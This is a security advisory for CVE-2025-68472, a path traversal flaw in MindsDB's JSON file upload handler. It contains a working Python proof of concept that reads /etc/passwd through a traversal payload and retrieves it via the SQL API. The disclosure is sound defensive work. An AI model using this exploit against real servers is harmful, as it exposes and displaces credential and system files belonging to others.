MindsDB has improper sanitation of filepath that leads to information disclosure and DOS
High8.1CVE-2025-68472 · Published Jan 12, 2026 · updated Jun 6, 2026
Affected versions
| Package | Affected | Fixed in |
|---|---|---|
| mindsdb PyPI | < 25.11.1 | 25.11.1 |
Details and references
### Summary [BlueRock](https://bluerock.io/) discovered an unauthenticated path traversal in the file upload API lets any caller read arbitrary files from the server filesystem and move them into MindsDB’s storage, exposing sensitive data. ### Details The PUT handler in file.py directly joins user-controlled data into a filesystem path when the request body is JSON and `source_type` is not `"url"`: - `data = request.json` (line ~104) accepts attacker input without validation. - `file_path = os.path.join(temp_dir_path, data["file"])` (line ~178) creates the path inside a temporary directory, but if `data["file"]` is absolute (e.g., `/home/secret.csv`), `os.path.join` ignores `temp_dir_path` and targets the attacker-specified location. - The resulting path is handed to `ca.file_controller.save_file(...)`, which wraps `FileReader(path=source_path)` (`mindsdb/interfaces/file/file_controller.py:66`), causing the application to read the contents of that arbitrary file. The subsequent `shutil.move(file_path, ...)` call also relocates the victim file into MindsDB’s managed storage. Only multipart uploads and URL-sourced uploads receive sanitization; JSON uploads lack any call to `clear_filename` or equivalent checks. ### PoC 1. Run MindsDB in Docker: ```bash docker pull mindsdb/mindsdb:latest docker run --rm -it -p 47334:47334 --name mindsdb-poc mindsdb/mindsdb:latest ``` 2. Execute the exploit from the host (save as poc.py and run with `python poc.py`): ```python # poc.py import requests, json base = "http://127.0.0.1:47334" payload = {"file": "../../../../../etc/passwd"} # no source_type -> hits vulnerable branch r = requests.put(f"{base}/api/files/leak_rel", json=payload, timeout=10) print("PUT status:", r.status_code, r.text) q = requests.post( f"{base}/api/sql/query", json={"query": "SELECT * FROM files.leak_rel"}, timeout=10, ) print("SQL response:", json.dumps(q.json(), indent=2)) ``` 3. The SQL response returns the contents of `/etc/passwd` . The original file disappears from its source location because the handler moves it into MindsDB’s storage directory. 4. Detailed report is available on BlueRock's blog: https://www.bluerock.io/post/cve-2025-68472-mindsdb-file-upload-path-traversal ### Impact - Any user able to reach the REST API can read and exfiltrate arbitrary files that the MindsDB process can access, potentially including credentials, configuration secrets, and private keys.
- CVSS 3.1
- CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H
- Severity from
- GitHub (reviewed advisory)
- Weakness
- CWE-22, CWE-23, CWE-36
- Also known as
- CVE-2025-68472, PYSEC-2026-90
- github.com/mindsdb/mindsdb/security/advisories/GHSA-qqhf-pm3j-96g7
- nvd.nist.gov/vuln/detail/CVE-2025-68472
- github.com/mindsdb/mindsdb
- github.com/mindsdb/mindsdb/releases/tag/v25.11.1
- github.com/pypa/advisory-database/tree/main/vulns/mindsdb/PYSEC-2026-90.yaml
- www.bluerock.io/post/cve-2025-68472-mindsdb-file-upload-path-traversal
More MindsDB advisories
All MindsDB| Date | Advisory | Severity | Fixed in |
|---|---|---|---|
| Feb 16 | MindsDB affected by a SSRF vulnerability CVE-2026-2531Low6.3no fix yet | Low6.3 | No fix yet |
| Feb 24 | MindsDB: Path Traversal in /api/files Leading to Remote Code Execution CVE-2026-27483High8.8fixed in 25.9.1.1 | High8.8 | 25.9.1.1 |
| May 4 | MindsDB has an Improper Access Control Issue CVE-2026-7711Medium7.3no fix yet | Medium7.3 | No fix yet |
| Sep 122024 | MindsDB Cross-site Scripting vulnerability CVE-2024-45856Medium9.0no fix yet | Medium9.0 | No fix yet |
| Sep 122024 | MindsDB Deserialization of Untrusted Data vulnerability CVE-2024-45854High7.1no fix yet | High7.1 | No fix yet |
| Sep 122024 | MindsDB Deserialization of Untrusted Data vulnerability CVE-2024-45852High8.8no fix yet | High8.8 | No fix yet |